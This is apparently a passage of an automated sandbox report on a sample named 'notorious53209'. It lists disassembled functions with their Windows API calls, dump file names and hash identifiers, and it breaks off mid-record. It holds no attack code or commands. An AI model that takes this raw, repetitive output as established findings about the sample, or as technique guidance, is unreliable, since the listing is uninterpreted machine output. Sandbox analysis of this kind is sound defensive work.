                                                  • Opcode Fuzzy Hash: baff54d427c5b591b8eb4c4ac036887f26f2d8c7832f7d95f60edef133c55ece
                                                  • Instruction Fuzzy Hash: 7321C532610119BFDF118F54DC85FAB37AEEF89754F018124FA04971D0C771AC619BA0
                                                  Function 0090797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 009079E1
                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 009079F6
                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00907A03
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: msctls_trackbar32
                                                  • API String ID: 3850602802-1010561917
                                                  • Opcode ID: 1b0dfbef700654ad897dbad7b8297630b09f599543c26db9376f63879d80eaa8
                                                  • Instruction ID: 8036228c5dadc38eee09df911dc42f1f2aae6280c1e90ddb2ecc76c252c18bf1
                                                  • Opcode Fuzzy Hash: 1b0dfbef700654ad897dbad7b8297630b09f599543c26db9376f63879d80eaa8
                                                  • Instruction Fuzzy Hash: 9A11E372654208BEEF209FA4CC05FAB77ADEFC9B68F014519FA51A60D0D672A811DB60
                                                  Function 008FC304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 008FC312
                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW,?,008C1D88,?), ref: 008FC324
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                  • API String ID: 2574300362-1816364905
                                                  • Opcode ID: beac9d172dacee143597c13f5d7f6ee47cc4ba542eb51ca0a4e744cfb3c05aa4
                                                  • Instruction ID: 604852f38ee592954309cdb01875c62051f94de7a376020da725001eecddba10
                                                  • Opcode Fuzzy Hash: beac9d172dacee143597c13f5d7f6ee47cc4ba542eb51ca0a4e744cfb3c05aa4
                                                  • Instruction Fuzzy Hash: 41E08C7421430BCFCB344B75C814A9676D8FB48388F808439EA85C2750E770D940CAB0
                                                  Function 00884C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00884CA3
                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,00884C2E), ref: 00884CB5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                  • API String ID: 2574300362-192647395
                                                  • Opcode ID: e89b669481be792049e97881254111a695673f217c9dcef954420107387a528e
                                                  • Instruction ID: 1afa8cd2587d2c3f2ed1d88045f489735cff6a5ef10bf6a551da26946f241eee
                                                  • Opcode Fuzzy Hash: e89b669481be792049e97881254111a695673f217c9dcef954420107387a528e
                                                  • Instruction Fuzzy Hash: 18D01732528723CFD730AF31DA2860676EAFF05795B11883A988AD6990E674DA80CB50
                                                  Function 00884D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00884DA2
                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00884DB4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                  • API String ID: 2574300362-1355242751
                                                  • Opcode ID: 752df5ded570fb244c91fbe26cf4c1285f58b057ea3d0e1147628a132fd70a67
                                                  • Instruction ID: 1005021e964be8cb80774446a85b0e70bdd69e83d80bbdf199ccdf362141a98e
                                                  • Opcode Fuzzy Hash: 752df5ded570fb244c91fbe26cf4c1285f58b057ea3d0e1147628a132fd70a67
                                                  • Instruction Fuzzy Hash: 2AD01772568713CFD730AF71D818A46B6E8FF09359B11883AD8C6D6990E770D880CB50
                                                  Function 00884D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00884D6F
                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,009462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00884D81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                  • API String ID: 2574300362-3689287502
                                                  • Opcode ID: e81ba11c53449fa43add13dcf7ca33d6eb627839964c72c1a9b2494a5e783b73
                                                  • Instruction ID: bf7a2d6df4fc0381dcadaf0fcd887f7b148ce6ad837ad736175a4018859c1820
                                                  • Opcode Fuzzy Hash: e81ba11c53449fa43add13dcf7ca33d6eb627839964c72c1a9b2494a5e783b73
                                                  • Instruction Fuzzy Hash: 7AD01771528713CFD730AF71D818616B6E8FF15356B118C3A9886D6A90E670D880CF50
                                                  Function 00901072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00901080
                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00901092
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                  • API String ID: 2574300362-4033151799
                                                  • Opcode ID: 6fe8507de8a6102cc4550fcde5168878bddb5c495fd94ca63005a6bad0d41c9f
                                                  • Instruction ID: fb6fbe532f5320a6b196336e0d403044786a02d1f776f71ee8defa77b66a4970
                                                  • Opcode Fuzzy Hash: 6fe8507de8a6102cc4550fcde5168878bddb5c495fd94ca63005a6bad0d41c9f
                                                  • Instruction Fuzzy Hash: BDD01730528712CFD7309F35E828A1B76F8AF59365F118D3AE8DADA590E770C8C0CA50
                                                  Function 008F93F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 008F9403
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW,?,0090F910), ref: 008F9415
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                  • API String ID: 2574300362-199464113
                                                  • Opcode ID: 6534effe13b28be3f6888e902a067dfdd61d7f5e85bce382fa979b5f3ac0e703
                                                  • Instruction ID: 2a5b8d92d4f1ac3570e7a69f261ffac2857fb5f978c7baa1c960398b3ea448ed
                                                  • Opcode Fuzzy Hash: 6534effe13b28be3f6888e902a067dfdd61d7f5e85bce382fa979b5f3ac0e703
                                                  • Instruction Fuzzy Hash: A1D0173452871BCFD7319F31D91861676E9FF25355B11C83AE5C6D6990E670C8C0DA50
                                                  Function 008D76C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 62b97e2174a0d0e7c404b9b94987d6ca69b5ecfdc7e534658c7da1b6568dd7e3
                                                  • Instruction ID: a46c85acda1867a3bc7370deea4927ce2de2a08932973f7a9d77242d4393c6d9
                                                  • Opcode Fuzzy Hash: 62b97e2174a0d0e7c404b9b94987d6ca69b5ecfdc7e534658c7da1b6568dd7e3
                                                  • Instruction Fuzzy Hash: DDC16075A0421AEFCB14CF94C894EAEBBB5FF48714B11869AE805EB351E730DD41DB90
                                                  Function 008FE33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?), ref: 008FE3D2
                                                  • CharLowerBuffW.USER32(?,?), ref: 008FE415
                                                    • Part of subcall function 008FDAB9: CharLowerBuffW.USER32(?,?), ref: 008FDAD9
                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 008FE615
                                                  • _memmove.LIBCMT ref: 008FE628
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                  • String ID:
                                                  • API String ID: 3659485706-0
                                                  • Opcode ID: 55227b13394096bfe48ebe045463f149588e5a967a6b4cd50804de65ec80f04f
                                                  • Instruction ID: 23b62cec22e9753ca3ab79b8084e0b535ed1e2d49db1ec1fe3b62f0d8ccc635c
                                                  • Opcode Fuzzy Hash: 55227b13394096bfe48ebe045463f149588e5a967a6b4cd50804de65ec80f04f
                                                  • Instruction Fuzzy Hash: 66C146716083158FC714DF28C48096ABBE4FF89718F14896EF999DB361D731EA46CB82
                                                  Function 008F83A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 008F83D8
                                                  • CoUninitialize.OLE32 ref: 008F83E3
                                                    • Part of subcall function 008DDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 008DDAC5
                                                  • VariantInit.OLEAUT32(?), ref: 008F83EE
                                                  • VariantClear.OLEAUT32(?), ref: 008F86BF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                  • String ID:
                                                  • API String ID: 780911581-0
                                                  • Opcode ID: 8a90bc3ff5edfde1e3574955e4db2672c90ed7092283bf4e89499af77e5f9efe
                                                  • Instruction ID: 22175188e4627ea9bde207f042b5ede9bf29a4851978784564c140731f39afe8
                                                  • Opcode Fuzzy Hash: 8a90bc3ff5edfde1e3574955e4db2672c90ed7092283bf4e89499af77e5f9efe
                                                  • Instruction Fuzzy Hash: B9A103752047159FDB10EF28C885A2ABBE5FF88314F184459FA9ADB3A1CB34ED05CB46
                                                  Function 008D7A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ProgIDFromCLSID.OLE32(?,00000000), ref: 008D7C32
                                                  • CoTaskMemFree.OLE32(00000000), ref: 008D7C4A
                                                  • CLSIDFromProgID.OLE32(?,?), ref: 008D7C6F
                                                  • _memcmp.LIBCMT ref: 008D7C90
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: FromProg$FreeTask_memcmp
                                                  • String ID:
                                                  • API String ID: 314563124-0
                                                  • Opcode ID: da25866710727b354dd112ed4571b70a233ac1ddb31c85a2aab39e65d1dd3f2a
                                                  • Instruction ID: e06102b92fac64bb68071d7b4a5a6cdb8e17984a76fa73635c01e4a3da944941
                                                  • Opcode Fuzzy Hash: da25866710727b354dd112ed4571b70a233ac1ddb31c85a2aab39e65d1dd3f2a
                                                  • Instruction Fuzzy Hash: AA810875A00109EFCB04DF94C984EEEB7B9FF89315F204199E506EB250EB71AE06CB61
                                                  Function 008D6DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Variant$AllocClearCopyInitString
                                                  • String ID:
                                                  • API String ID: 2808897238-0
                                                  • Opcode ID: c386fd23aade1cebdcb2b0ffa1128b05221e21829a8b14893d610829c3281737
                                                  • Instruction ID: 5431b1f5103a9478baa7fdc49abce77039ffc50a8f5368f956230787dbc5dc31
                                                  • Opcode Fuzzy Hash: c386fd23aade1cebdcb2b0ffa1128b05221e21829a8b14893d610829c3281737
                                                  • Instruction Fuzzy Hash: F651B230608705DEDB24AF69D895A2AB3E5FF48310F24891FE996CB7D1FE709C409B52
                                                  Function 00909A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowRect.USER32(00AD5190,?), ref: 00909AD2
                                                  • ScreenToClient.USER32(00000002,00000002), ref: 00909B05
                                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001), ref: 00909B72
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$ClientMoveRectScreen
                                                  • String ID:
                                                  • API String ID: 3880355969-0
                                                  • Opcode ID: bf76700afb16964d636978db37e59435cc3e38614d74bb007fc09e52b1bfcd12
                                                  • Instruction ID: 2cbb63f2247a06f8e7e8cbea9b4efd81c7aba771b96048a02b75a3924381d383
                                                  • Opcode Fuzzy Hash: bf76700afb16964d636978db37e59435cc3e38614d74bb007fc09e52b1bfcd12
                                                  • Instruction Fuzzy Hash: 10513E75A04209EFDF20DF68D880AAE7BB9FF45324F108259F8159B2D1D730AD81DB90
                                                  Function 008EBA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 008EBB09
                                                  • GetLastError.KERNEL32(?,00000000), ref: 008EBB2F
                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 008EBB54
                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 008EBB80
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                  • String ID:
                                                  • API String ID: 3321077145-0
                                                  • Opcode ID: bfd0c51ce59400e3edf534f3732c1106d98cb168cc5a6a0930de8c7eceea0097
                                                  • Instruction ID: c72f123d8b3b029387caa2d040420a180838b137db17f9b9c22e6f262cb84f25
                                                  • Opcode Fuzzy Hash: bfd0c51ce59400e3edf534f3732c1106d98cb168cc5a6a0930de8c7eceea0097
                                                  • Instruction Fuzzy Hash: 4E410C35200550DFCF11EF19C585A6DBBE1FF89320B198498E88A9B762CB34FD01DB92
                                                  Function 00908AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00908B4D
                                                  Memory Dump Source
